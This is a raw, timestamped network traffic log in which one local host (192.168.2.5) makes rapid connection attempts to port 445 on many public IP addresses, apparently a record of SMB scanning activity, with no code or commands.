                                                        Dec 22, 2022 10:07:09.231481075 CET56550445192.168.2.52.104.80.103
                                                        Dec 22, 2022 10:07:09.231719971 CET56552445192.168.2.575.17.175.90
                                                        Dec 22, 2022 10:07:09.232265949 CET56558445192.168.2.597.52.94.52
                                                        Dec 22, 2022 10:07:09.232444048 CET56560445192.168.2.560.233.101.62
                                                        Dec 22, 2022 10:07:09.232630014 CET56561445192.168.2.510.150.114.95
                                                        Dec 22, 2022 10:07:09.233347893 CET56571445192.168.2.537.222.205.56
                                                        Dec 22, 2022 10:07:09.233441114 CET56572445192.168.2.541.102.151.91
                                                        Dec 22, 2022 10:07:09.233545065 CET56573445192.168.2.5211.35.73.82
                                                        Dec 22, 2022 10:07:09.233834028 CET56576445192.168.2.585.250.74.235
                                                        Dec 22, 2022 10:07:09.233870983 CET56577445192.168.2.574.101.94.147
                                                        Dec 22, 2022 10:07:09.263616085 CET56578445192.168.2.558.63.106.198
                                                        Dec 22, 2022 10:07:09.263905048 CET4455653041.203.13.110192.168.2.5
                                                        Dec 22, 2022 10:07:09.264516115 CET56579445192.168.2.589.145.91.126
                                                        Dec 22, 2022 10:07:09.265017033 CET56581445192.168.2.5199.198.197.109
                                                        Dec 22, 2022 10:07:09.265136957 CET56582445192.168.2.5193.194.41.155
                                                        Dec 22, 2022 10:07:09.265541077 CET56584445192.168.2.5116.16.31.24
                                                        Dec 22, 2022 10:07:09.265980005 CET56588445192.168.2.5160.34.163.226
                                                        Dec 22, 2022 10:07:09.266175985 CET56590445192.168.2.5101.189.243.82
                                                        Dec 22, 2022 10:07:09.267122984 CET56596445192.168.2.560.44.156.75
                                                        Dec 22, 2022 10:07:09.268266916 CET56602445192.168.2.556.86.227.97
                                                        Dec 22, 2022 10:07:09.268493891 CET56604445192.168.2.553.84.114.159
                                                        Dec 22, 2022 10:07:09.268799067 CET56605445192.168.2.5205.70.252.54
                                                        Dec 22, 2022 10:07:09.269705057 CET56606445192.168.2.5161.29.128.69
                                                        Dec 22, 2022 10:07:09.279036045 CET56607445192.168.2.581.73.72.231
                                                        Dec 22, 2022 10:07:09.280081034 CET56608445192.168.2.5117.63.90.22
                                                        Dec 22, 2022 10:07:09.434452057 CET56613445192.168.2.541.203.13.111
                                                        Dec 22, 2022 10:07:09.481677055 CET56614445192.168.2.588.218.188.31
                                                        Dec 22, 2022 10:07:09.684315920 CET56544445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:09.824865103 CET55271445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:07:09.888128042 CET56623445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:09.923105955 CET4455662384.7.167.3192.168.2.5
                                                        Dec 22, 2022 10:07:09.926629066 CET56623445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:09.926682949 CET56623445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:09.927227974 CET56627445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:09.961842060 CET4455662784.7.167.3192.168.2.5
                                                        Dec 22, 2022 10:07:09.962205887 CET56627445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:09.962258101 CET56627445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:10.215559006 CET56544445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:10.231183052 CET56627445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:10.231225967 CET56623445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:10.356688023 CET56634445192.168.2.513.15.102.183
                                                        Dec 22, 2022 10:07:10.356698990 CET56635445192.168.2.516.193.250.237
                                                        Dec 22, 2022 10:07:10.356751919 CET56636445192.168.2.5134.122.96.242
                                                        Dec 22, 2022 10:07:10.357186079 CET56644445192.168.2.5148.74.150.174
                                                        Dec 22, 2022 10:07:10.357264996 CET56645445192.168.2.5132.107.238.112
                                                        Dec 22, 2022 10:07:10.357435942 CET56648445192.168.2.5162.64.31.96
                                                        Dec 22, 2022 10:07:10.357861042 CET56656445192.168.2.5175.26.199.25
                                                        Dec 22, 2022 10:07:10.357965946 CET56658445192.168.2.57.182.27.46
                                                        Dec 22, 2022 10:07:10.358051062 CET56657445192.168.2.590.194.157.5
                                                        Dec 22, 2022 10:07:10.358295918 CET56661445192.168.2.5135.237.213.196
                                                        Dec 22, 2022 10:07:10.358329058 CET56662445192.168.2.587.168.9.45
                                                        Dec 22, 2022 10:07:10.388052940 CET56665445192.168.2.5124.35.172.246
                                                        Dec 22, 2022 10:07:10.388463020 CET56671445192.168.2.5192.250.134.210
                                                        Dec 22, 2022 10:07:10.388782024 CET56673445192.168.2.5113.76.15.126
                                                        Dec 22, 2022 10:07:10.389300108 CET56674445192.168.2.511.239.97.107
                                                        Dec 22, 2022 10:07:10.389528990 CET56675445192.168.2.5218.231.67.244
                                                        Dec 22, 2022 10:07:10.390593052 CET56677445192.168.2.5166.207.147.254
                                                        Dec 22, 2022 10:07:10.390763998 CET56678445192.168.2.5170.78.139.158
                                                        Dec 22, 2022 10:07:10.391108036 CET56681445192.168.2.574.114.94.24
                                                        Dec 22, 2022 10:07:10.391330957 CET56683445192.168.2.579.207.224.194
                                                        Dec 22, 2022 10:07:10.391551018 CET56686445192.168.2.5139.82.248.130
                                                        Dec 22, 2022 10:07:10.391822100 CET56688445192.168.2.51.51.229.65
                                                        Dec 22, 2022 10:07:10.403975010 CET56692445192.168.2.5218.234.109.218
                                                        Dec 22, 2022 10:07:10.404671907 CET56695445192.168.2.5114.46.155.185
                                                        Dec 22, 2022 10:07:10.497948885 CET56697445192.168.2.541.203.13.112
                                                        Dec 22, 2022 10:07:10.528050900 CET56377445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:10.543658972 CET56627445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:10.560158968 CET56699445192.168.2.588.218.188.32
                                                        Dec 22, 2022 10:07:10.599761009 CET44556053149.248.216.3192.168.2.5
                                                        Dec 22, 2022 10:07:10.605580091 CET4455669988.218.188.32192.168.2.5
                                                        Dec 22, 2022 10:07:10.699940920 CET56382445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:10.779472113 CET44556052149.248.216.3192.168.2.5
                                                        Dec 22, 2022 10:07:10.779596090 CET56052445192.168.2.5149.248.216.3
                                                        Dec 22, 2022 10:07:10.840583086 CET56623445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:11.106345892 CET56699445192.168.2.588.218.188.32
                                                        Dec 22, 2022 10:07:11.152595043 CET4455669988.218.188.32192.168.2.5
                                                        Dec 22, 2022 10:07:11.153125048 CET56627445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:11.200035095 CET56544445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:11.309556007 CET56712445192.168.2.538.35.118.16
                                                        Dec 22, 2022 10:07:11.466275930 CET56718445192.168.2.5121.240.82.212
                                                        Dec 22, 2022 10:07:11.466418982 CET56719445192.168.2.5143.32.161.51
                                                        Dec 22, 2022 10:07:11.466716051 CET56721445192.168.2.5195.198.13.156
                                                        Dec 22, 2022 10:07:11.467240095 CET56728445192.168.2.5110.59.1.112
                                                        Dec 22, 2022 10:07:11.467345953 CET56729445192.168.2.576.246.195.138
                                                        Dec 22, 2022 10:07:11.467787981 CET56733445192.168.2.5116.156.22.12
                                                        Dec 22, 2022 10:07:11.468327045 CET56740445192.168.2.5169.139.198.153
                                                        Dec 22, 2022 10:07:11.468369961 CET56741445192.168.2.5110.14.226.211
                                                        Dec 22, 2022 10:07:11.468554974 CET56743445192.168.2.5165.157.58.99
                                                        Dec 22, 2022 10:07:11.468786955 CET56745445192.168.2.523.129.13.208
                                                        Dec 22, 2022 10:07:11.468950033 CET56746445192.168.2.536.240.145.43
                                                        Dec 22, 2022 10:07:11.481648922 CET4455671238.35.118.16192.168.2.5
                                                        Dec 22, 2022 10:07:11.481776953 CET56712445192.168.2.538.35.118.16
                                                        Dec 22, 2022 10:07:11.481898069 CET56712445192.168.2.538.35.118.16
                                                        Dec 22, 2022 10:07:11.512847900 CET56747445192.168.2.5113.181.90.196
                                                        Dec 22, 2022 10:07:11.513220072 CET56750445192.168.2.52.137.72.148
                                                        Dec 22, 2022 10:07:11.513320923 CET56753445192.168.2.542.121.186.163
                                                        Dec 22, 2022 10:07:11.513420105 CET56754445192.168.2.549.57.2.251
                                                        Dec 22, 2022 10:07:11.513603926 CET56756445192.168.2.526.243.5.213
                                                        Dec 22, 2022 10:07:11.513972044 CET56759445192.168.2.5191.167.7.228
                                                        Dec 22, 2022 10:07:11.514164925 CET56764445192.168.2.5223.196.92.101
                                                        Dec 22, 2022 10:07:11.514241934 CET56765445192.168.2.5159.16.193.70
                                                        Dec 22, 2022 10:07:11.514292002 CET56766445192.168.2.54.22.247.28
                                                        Dec 22, 2022 10:07:11.514420986 CET56767445192.168.2.595.129.221.192
                                                        Dec 22, 2022 10:07:11.514782906 CET56775445192.168.2.5119.36.32.238
                                                        Dec 22, 2022 10:07:11.516001940 CET56777445192.168.2.569.116.20.117
                                                        Dec 22, 2022 10:07:11.516043901 CET56778445192.168.2.56.217.155.200
                                                        Dec 22, 2022 10:07:11.516093016 CET56779445192.168.2.5172.58.240.90
                                                        Dec 22, 2022 10:07:11.575398922 CET56780445192.168.2.541.203.13.113
                                                        Dec 22, 2022 10:07:11.622616053 CET56782445192.168.2.588.218.188.33
                                                        Dec 22, 2022 10:07:11.653805017 CET4455671238.35.118.16192.168.2.5
                                                        Dec 22, 2022 10:07:11.655061007 CET56712445192.168.2.538.35.118.16
                                                        Dec 22, 2022 10:07:11.667798042 CET4455678288.218.188.33192.168.2.5
                                                        Dec 22, 2022 10:07:11.826802015 CET4455671238.35.118.16192.168.2.5
                                                        Dec 22, 2022 10:07:11.827064037 CET56712445192.168.2.538.35.118.16
                                                        Dec 22, 2022 10:07:11.998740911 CET4455671238.35.118.16192.168.2.5
                                                        Dec 22, 2022 10:07:12.044013977 CET56623445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:12.065058947 CET56792445192.168.2.538.35.118.17
                                                        Dec 22, 2022 10:07:12.168800116 CET56782445192.168.2.588.218.188.33
                                                        Dec 22, 2022 10:07:12.213809967 CET4455678288.218.188.33192.168.2.5
                                                        Dec 22, 2022 10:07:12.239458084 CET4455679238.35.118.17192.168.2.5
                                                        Dec 22, 2022 10:07:12.239588022 CET56792445192.168.2.538.35.118.17
                                                        Dec 22, 2022 10:07:12.239737988 CET56792445192.168.2.538.35.118.17
                                                        Dec 22, 2022 10:07:12.240427017 CET56796445192.168.2.538.35.118.17
                                                        Dec 22, 2022 10:07:12.356549978 CET56627445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:12.411739111 CET4455679638.35.118.17192.168.2.5
                                                        Dec 22, 2022 10:07:12.412034035 CET56796445192.168.2.538.35.118.17
                                                        Dec 22, 2022 10:07:12.412089109 CET56796445192.168.2.538.35.118.17
                                                        Dec 22, 2022 10:07:12.413738012 CET4455679238.35.118.17192.168.2.5
                                                        Dec 22, 2022 10:07:12.413769960 CET4455679238.35.118.17192.168.2.5
                                                        Dec 22, 2022 10:07:12.576735973 CET56804445192.168.2.5108.49.124.7
                                                        Dec 22, 2022 10:07:12.576987028 CET56805445192.168.2.5169.141.111.234
                                                        Dec 22, 2022 10:07:12.583908081 CET4455679638.35.118.17192.168.2.5
                                                        Dec 22, 2022 10:07:12.584031105 CET56796445192.168.2.538.35.118.17
                                                        Dec 22, 2022 10:07:12.584079027 CET56807445192.168.2.5121.205.141.128
                                                        Dec 22, 2022 10:07:12.584281921 CET56809445192.168.2.557.30.63.184
                                                        Dec 22, 2022 10:07:12.584336996 CET56810445192.168.2.574.117.189.17
                                                        Dec 22, 2022 10:07:12.584714890 CET56817445192.168.2.5204.188.213.46
                                                        Dec 22, 2022 10:07:12.584847927 CET56821445192.168.2.5105.206.128.12
                                                        Dec 22, 2022 10:07:12.584947109 CET56822445192.168.2.5169.158.19.17
                                                        Dec 22, 2022 10:07:12.585180044 CET56829445192.168.2.5207.46.82.119
                                                        Dec 22, 2022 10:07:12.585266113 CET56831445192.168.2.555.200.40.92
                                                        Dec 22, 2022 10:07:12.585412025 CET56832445192.168.2.556.43.150.147
                                                        Dec 22, 2022 10:07:12.638654947 CET56833445192.168.2.5160.0.3.87
                                                        Dec 22, 2022 10:07:12.640291929 CET56838445192.168.2.5223.183.4.90
                                                        Dec 22, 2022 10:07:12.640780926 CET56839445192.168.2.5191.217.160.247
                                                        Dec 22, 2022 10:07:12.641232967 CET56841445192.168.2.535.77.51.173
                                                        Dec 22, 2022 10:07:12.641416073 CET56842445192.168.2.5168.26.195.165
                                                        Dec 22, 2022 10:07:12.643116951 CET56849445192.168.2.526.56.69.49
                                                        Dec 22, 2022 10:07:12.643441916 CET56850445192.168.2.536.98.86.153
                                                        Dec 22, 2022 10:07:12.643482924 CET56851445192.168.2.528.185.153.171
                                                        Dec 22, 2022 10:07:12.643629074 CET56852445192.168.2.540.33.91.82
                                                        Dec 22, 2022 10:07:12.643878937 CET56854445192.168.2.568.79.80.7
                                                        Dec 22, 2022 10:07:12.644254923 CET56861445192.168.2.5117.164.232.213
                                                        Dec 22, 2022 10:07:12.644556999 CET56863445192.168.2.541.203.13.114
                                                        Dec 22, 2022 10:07:12.645874977 CET56864445192.168.2.5155.138.141.211
                                                        Dec 22, 2022 10:07:12.645920038 CET56865445192.168.2.564.85.86.149
                                                        Dec 22, 2022 10:07:12.646084070 CET56866445192.168.2.5159.78.91.46
                                                        Dec 22, 2022 10:07:12.684932947 CET56867445192.168.2.588.218.188.34
                                                        Dec 22, 2022 10:07:12.755557060 CET4455679638.35.118.17192.168.2.5
                                                        Dec 22, 2022 10:07:12.755742073 CET56796445192.168.2.538.35.118.17
                                                        Dec 22, 2022 10:07:12.927077055 CET4455679638.35.118.17192.168.2.5
                                                        Dec 22, 2022 10:07:13.153318882 CET56544445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:13.559595108 CET56627445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:13.606858015 CET56887445192.168.2.5149.248.216.3
                                                        Dec 22, 2022 10:07:13.633315086 CET44556887149.248.216.3192.168.2.5
                                                        Dec 22, 2022 10:07:13.633440018 CET56887445192.168.2.5149.248.216.3
                                                        Dec 22, 2022 10:07:13.633493900 CET56887445192.168.2.5149.248.216.3
                                                        Dec 22, 2022 10:07:13.660202980 CET44556887149.248.216.3192.168.2.5
                                                        Dec 22, 2022 10:07:13.687424898 CET56889445192.168.2.5175.228.62.50
                                                        Dec 22, 2022 10:07:13.687434912 CET56890445192.168.2.5102.122.89.158
                                                        Dec 22, 2022 10:07:13.687728882 CET56892445192.168.2.5111.5.199.6
                                                        Dec 22, 2022 10:07:13.687817097 CET56893445192.168.2.547.234.222.40
                                                        Dec 22, 2022 10:07:13.687917948 CET56894445192.168.2.5166.173.142.160
                                                        Dec 22, 2022 10:07:13.688225031 CET56901445192.168.2.5130.63.170.160
                                                        Dec 22, 2022 10:07:13.688401937 CET56905445192.168.2.5129.60.55.231
                                                        Dec 22, 2022 10:07:13.688517094 CET56907445192.168.2.5132.214.63.244
                                                        Dec 22, 2022 10:07:13.688760996 CET56913445192.168.2.572.115.177.80
                                                        Dec 22, 2022 10:07:13.688833952 CET56915445192.168.2.5176.99.190.222
                                                        Dec 22, 2022 10:07:13.688942909 CET56917445192.168.2.596.117.238.243
                                                        Dec 22, 2022 10:07:13.716166019 CET56918445192.168.2.541.203.13.115
                                                        Dec 22, 2022 10:07:13.747270107 CET56919445192.168.2.588.218.188.35
                                                        Dec 22, 2022 10:07:13.763478041 CET56920445192.168.2.553.138.239.154
                                                        Dec 22, 2022 10:07:13.764780045 CET56925445192.168.2.5165.118.10.99
                                                        Dec 22, 2022 10:07:13.765115976 CET56926445192.168.2.512.233.68.124
                                                        Dec 22, 2022 10:07:13.765482903 CET56928445192.168.2.534.154.98.146
                                                        Dec 22, 2022 10:07:13.765631914 CET56929445192.168.2.5209.82.15.240
                                                        Dec 22, 2022 10:07:13.766520023 CET56936445192.168.2.565.141.253.51
                                                        Dec 22, 2022 10:07:13.767231941 CET56937445192.168.2.519.165.96.125
                                                        Dec 22, 2022 10:07:13.767555952 CET56938445192.168.2.5121.141.238.165
                                                        Dec 22, 2022 10:07:13.767714024 CET56939445192.168.2.516.244.76.26
                                                        Dec 22, 2022 10:07:13.768222094 CET56942445192.168.2.5109.39.101.105
                                                        Dec 22, 2022 10:07:13.768898010 CET56948445192.168.2.5116.254.53.28
                                                        Dec 22, 2022 10:07:13.769789934 CET56950445192.168.2.544.20.106.236
                                                        Dec 22, 2022 10:07:13.770603895 CET56951445192.168.2.59.201.103.83
                                                        Dec 22, 2022 10:07:13.771297932 CET56952445192.168.2.541.190.101.161
                                                        Dec 22, 2022 10:07:13.795077085 CET4455691988.218.188.35192.168.2.5
                                                        Dec 22, 2022 10:07:13.795218945 CET56919445192.168.2.588.218.188.35
                                                        Dec 22, 2022 10:07:13.796260118 CET56919445192.168.2.588.218.188.35
                                                        Dec 22, 2022 10:07:13.804312944 CET56953445192.168.2.588.218.188.35
                                                        Dec 22, 2022 10:07:13.841579914 CET4455691988.218.188.35192.168.2.5
                                                        Dec 22, 2022 10:07:13.842190027 CET4455691988.218.188.35192.168.2.5
                                                        Dec 22, 2022 10:07:13.850713015 CET4455695388.218.188.35192.168.2.5
                                                        Dec 22, 2022 10:07:13.850866079 CET56953445192.168.2.588.218.188.35
                                                        Dec 22, 2022 10:07:13.850866079 CET56953445192.168.2.588.218.188.35
                                                        Dec 22, 2022 10:07:13.899554014 CET4455695388.218.188.35192.168.2.5
                                                        Dec 22, 2022 10:07:13.982939959 CET4455695241.190.101.161192.168.2.5
                                                        Dec 22, 2022 10:07:14.091031075 CET56377445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:14.278465986 CET56382445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:14.450352907 CET56623445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:14.453816891 CET44556544142.219.19.3192.168.2.5
                                                        Dec 22, 2022 10:07:14.453850031 CET44556544142.219.19.3192.168.2.5
                                                        Dec 22, 2022 10:07:14.453865051 CET44556544142.219.19.3192.168.2.5
                                                        Dec 22, 2022 10:07:14.497172117 CET56952445192.168.2.541.190.101.161
                                                        Dec 22, 2022 10:07:14.513776064 CET56970445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:14.681154966 CET44556970142.219.19.4192.168.2.5
                                                        Dec 22, 2022 10:07:14.681572914 CET56970445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:14.681698084 CET56970445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:14.682451010 CET56971445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:14.708899021 CET4455695241.190.101.161192.168.2.5
                                                        Dec 22, 2022 10:07:14.762839079 CET56627445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:14.779376030 CET56977445192.168.2.541.203.13.116
                                                        Dec 22, 2022 10:07:14.810117006 CET56978445192.168.2.5221.78.252.136
                                                        Dec 22, 2022 10:07:14.810296059 CET56980445192.168.2.5163.128.149.124
                                                        Dec 22, 2022 10:07:14.810424089 CET56979445192.168.2.5196.38.202.224
                                                        Dec 22, 2022 10:07:14.810425043 CET56981445192.168.2.5143.188.121.21
                                                        Dec 22, 2022 10:07:14.810523033 CET56982445192.168.2.5118.195.134.228
                                                        Dec 22, 2022 10:07:14.811017036 CET56990445192.168.2.58.34.105.179
                                                        Dec 22, 2022 10:07:14.811230898 CET56993445192.168.2.5173.148.153.110
                                                        Dec 22, 2022 10:07:14.811455965 CET56997445192.168.2.5110.22.146.191
                                                        Dec 22, 2022 10:07:14.811717033 CET57002445192.168.2.5200.108.225.166
                                                        Dec 22, 2022 10:07:14.811825991 CET57004445192.168.2.5173.196.186.247
                                                        Dec 22, 2022 10:07:14.812005043 CET57006445192.168.2.5182.76.119.101
                                                        Dec 22, 2022 10:07:14.849735022 CET44556971142.219.19.4192.168.2.5
                                                        Dec 22, 2022 10:07:14.849824905 CET56971445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:14.849908113 CET56971445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:14.888644934 CET57007445192.168.2.5120.28.158.215
                                                        Dec 22, 2022 10:07:14.889280081 CET57008445192.168.2.5198.110.48.91
                                                        Dec 22, 2022 10:07:14.889482021 CET57009445192.168.2.564.206.85.116
                                                        Dec 22, 2022 10:07:14.889950991 CET57014445192.168.2.5144.124.174.178
                                                        Dec 22, 2022 10:07:14.890090942 CET57015445192.168.2.5134.113.47.17
                                                        Dec 22, 2022 10:07:14.890345097 CET57017445192.168.2.5173.153.128.140
                                                        Dec 22, 2022 10:07:14.890909910 CET57023445192.168.2.5206.89.58.112
                                                        Dec 22, 2022 10:07:14.891105890 CET57025445192.168.2.5101.203.238.95
                                                        Dec 22, 2022 10:07:14.892303944 CET57026445192.168.2.5168.229.214.62
                                                        Dec 22, 2022 10:07:14.892654896 CET57029445192.168.2.5175.36.26.107
                                                        Dec 22, 2022 10:07:14.900273085 CET57035445192.168.2.5171.19.28.235
                                                        Dec 22, 2022 10:07:14.901690960 CET57037445192.168.2.5116.172.139.56
                                                        Dec 22, 2022 10:07:14.901724100 CET57038445192.168.2.58.172.6.210
                                                        Dec 22, 2022 10:07:14.901974916 CET57039445192.168.2.518.115.229.27
                                                        Dec 22, 2022 10:07:15.215945959 CET56970445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:15.325354099 CET56971445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:15.857465029 CET57060445192.168.2.541.203.13.117
                                                        Dec 22, 2022 10:07:15.903552055 CET56971445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:15.935213089 CET57062445192.168.2.538.35.118.17
                                                        Dec 22, 2022 10:07:15.935480118 CET57063445192.168.2.532.109.38.248
                                                        Dec 22, 2022 10:07:15.935663939 CET57064445192.168.2.5171.41.7.37
                                                        Dec 22, 2022 10:07:15.935877085 CET57065445192.168.2.531.176.242.75
                                                        Dec 22, 2022 10:07:15.935956001 CET57067445192.168.2.545.195.98.17
                                                        Dec 22, 2022 10:07:15.936511993 CET57075445192.168.2.5138.63.174.243
                                                        Dec 22, 2022 10:07:15.936831951 CET57078445192.168.2.5201.211.46.97
                                                        Dec 22, 2022 10:07:15.937241077 CET57082445192.168.2.532.196.130.220
                                                        Dec 22, 2022 10:07:15.937591076 CET57087445192.168.2.5174.92.107.65
                                                        Dec 22, 2022 10:07:15.937849998 CET57088445192.168.2.5141.25.44.237
                                                        Dec 22, 2022 10:07:15.938405037 CET57091445192.168.2.568.0.76.163
                                                        Dec 22, 2022 10:07:15.997729063 CET57093445192.168.2.5124.160.184.43
                                                        Dec 22, 2022 10:07:15.998012066 CET57096445192.168.2.565.6.200.188
                                                        Dec 22, 2022 10:07:15.998274088 CET57101445192.168.2.5198.138.224.120
                                                        Dec 22, 2022 10:07:15.998284101 CET57098445192.168.2.5172.13.166.131
                                                        Dec 22, 2022 10:07:15.998497009 CET57106445192.168.2.5103.78.192.223
                                                        Dec 22, 2022 10:07:15.998559952 CET57107445192.168.2.599.230.93.20
                                                        Dec 22, 2022 10:07:15.998790979 CET57110445192.168.2.5178.224.186.192
                                                        Dec 22, 2022 10:07:15.998881102 CET57111445192.168.2.5161.26.78.42
                                                        Dec 22, 2022 10:07:15.999283075 CET57119445192.168.2.5101.33.116.136
                                                        Dec 22, 2022 10:07:16.001117945 CET57120445192.168.2.5213.201.197.171
                                                        Dec 22, 2022 10:07:16.001184940 CET57121445192.168.2.561.126.237.50
                                                        Dec 22, 2022 10:07:16.001285076 CET57122445192.168.2.5220.187.116.26
                                                        Dec 22, 2022 10:07:16.001286030 CET57123445192.168.2.5208.245.225.160
                                                        Dec 22, 2022 10:07:16.001492023 CET57124445192.168.2.5120.124.10.135
                                                        Dec 22, 2022 10:07:16.109954119 CET4455706238.35.118.17192.168.2.5
                                                        Dec 22, 2022 10:07:16.110955954 CET57062445192.168.2.538.35.118.17
                                                        Dec 22, 2022 10:07:16.111346006 CET57062445192.168.2.538.35.118.17
                                                        Dec 22, 2022 10:07:16.200455904 CET56970445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:16.285700083 CET4455706238.35.118.17192.168.2.5
                                                        Dec 22, 2022 10:07:16.285892963 CET57062445192.168.2.538.35.118.17
                                                        Dec 22, 2022 10:07:16.460695982 CET4455706238.35.118.17192.168.2.5
                                                        Dec 22, 2022 10:07:16.460874081 CET57062445192.168.2.538.35.118.17
                                                        Dec 22, 2022 10:07:16.635602951 CET4455706238.35.118.17192.168.2.5
                                                        Dec 22, 2022 10:07:16.701524019 CET57140445192.168.2.538.35.118.18
                                                        Dec 22, 2022 10:07:16.876200914 CET4455714038.35.118.18192.168.2.5
                                                        Dec 22, 2022 10:07:16.876405954 CET57140445192.168.2.538.35.118.18
                                                        Dec 22, 2022 10:07:16.876472950 CET57140445192.168.2.538.35.118.18
                                                        Dec 22, 2022 10:07:16.877024889 CET57143445192.168.2.538.35.118.18
                                                        Dec 22, 2022 10:07:16.905292034 CET57148445192.168.2.588.218.188.35
                                                        Dec 22, 2022 10:07:16.919868946 CET57149445192.168.2.541.203.13.118
                                                        Dec 22, 2022 10:07:16.951684952 CET4455714888.218.188.35192.168.2.5
                                                        Dec 22, 2022 10:07:16.951818943 CET57148445192.168.2.588.218.188.35
                                                        Dec 22, 2022 10:07:16.951877117 CET57148445192.168.2.588.218.188.35
                                                        Dec 22, 2022 10:07:16.966159105 CET56971445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:16.997668982 CET4455714888.218.188.35192.168.2.5
                                                        Dec 22, 2022 10:07:17.045223951 CET57151445192.168.2.5196.132.47.250
                                                        Dec 22, 2022 10:07:17.045238018 CET57152445192.168.2.5148.209.229.147
                                                        Dec 22, 2022 10:07:17.045305014 CET57153445192.168.2.5110.164.25.0
                                                        Dec 22, 2022 10:07:17.045434952 CET57154445192.168.2.549.146.84.252
                                                        Dec 22, 2022 10:07:17.045597076 CET57155445192.168.2.5148.154.169.136
                                                        Dec 22, 2022 10:07:17.046175003 CET57163445192.168.2.5219.244.128.241
                                                        Dec 22, 2022 10:07:17.046416044 CET57166445192.168.2.551.174.46.75
                                                        Dec 22, 2022 10:07:17.046721935 CET57170445192.168.2.530.152.29.105
                                                        Dec 22, 2022 10:07:17.047195911 CET57175445192.168.2.5204.67.38.170
                                                        Dec 22, 2022 10:07:17.047292948 CET57176445192.168.2.5211.228.126.214
                                                        Dec 22, 2022 10:07:17.047636986 CET57179445192.168.2.548.238.67.139
                                                        Dec 22, 2022 10:07:17.048333883 CET4455714338.35.118.18192.168.2.5
                                                        Dec 22, 2022 10:07:17.048472881 CET57143445192.168.2.538.35.118.18
                                                        Dec 22, 2022 10:07:17.049034119 CET57143445192.168.2.538.35.118.18
                                                        Dec 22, 2022 10:07:17.050899982 CET4455714038.35.118.18192.168.2.5
                                                        Dec 22, 2022 10:07:17.050992012 CET4455714038.35.118.18192.168.2.5
                                                        Dec 22, 2022 10:07:17.060657978 CET57180445192.168.2.588.218.188.36
                                                        Dec 22, 2022 10:07:17.107289076 CET57182445192.168.2.5123.122.151.226
                                                        Dec 22, 2022 10:07:17.107465982 CET57186445192.168.2.573.33.99.76
                                                        Dec 22, 2022 10:07:17.107530117 CET57187445192.168.2.5187.54.20.81
                                                        Dec 22, 2022 10:07:17.107639074 CET57188445192.168.2.5190.52.119.122
                                                        Dec 22, 2022 10:07:17.107948065 CET57196445192.168.2.568.186.189.214
                                                        Dec 22, 2022 10:07:17.108071089 CET57195445192.168.2.5168.94.162.97
                                                        Dec 22, 2022 10:07:17.108071089 CET57197445192.168.2.5166.20.39.211
                                                        Dec 22, 2022 10:07:17.108295918 CET57202445192.168.2.5164.8.250.89
                                                        Dec 22, 2022 10:07:17.108558893 CET57208445192.168.2.5198.117.226.64
                                                        Dec 22, 2022 10:07:17.110471964 CET57209445192.168.2.5197.83.59.163
                                                        Dec 22, 2022 10:07:17.110594988 CET57210445192.168.2.5136.93.75.44
                                                        Dec 22, 2022 10:07:17.110784054 CET57211445192.168.2.5100.27.177.5
                                                        Dec 22, 2022 10:07:17.110841990 CET57212445192.168.2.537.202.203.62
                                                        Dec 22, 2022 10:07:17.110934019 CET57213445192.168.2.5168.49.61.23
                                                        Dec 22, 2022 10:07:17.169244051 CET56627445192.168.2.584.7.167.3
                                                        Dec 22, 2022 10:07:17.220844030 CET4455714338.35.118.18192.168.2.5
                                                        Dec 22, 2022 10:07:17.220989943 CET57143445192.168.2.538.35.118.18
                                                        Dec 22, 2022 10:07:17.392380953 CET4455714338.35.118.18192.168.2.5
                                                        Dec 22, 2022 10:07:17.422205925 CET57143445192.168.2.538.35.118.18
                                                        Dec 22, 2022 10:07:17.593740940 CET4455714338.35.118.18192.168.2.5
                                                        Dec 22, 2022 10:07:17.982187033 CET57231445192.168.2.541.203.13.119
                                                        Dec 22, 2022 10:07:18.122805119 CET57237445192.168.2.588.218.188.37
                                                        Dec 22, 2022 10:07:18.169389963 CET56970445192.168.2.5142.219.19.4
                                                        Dec 22, 2022 10:07:18.169948101 CET57238445192.168.2.581.32.226.184
                                                        Dec 22, 2022 10:07:18.170120955 CET57239445192.168.2.5101.37.120.38
                                                        Dec 22, 2022 10:07:18.170247078 CET57240445192.168.2.568.81.46.152
                                                        Dec 22, 2022 10:07:18.170403957 CET57241445192.168.2.5128.98.144.68
                                                        Dec 22, 2022 10:07:18.170526028 CET57242445192.168.2.5149.252.146.0
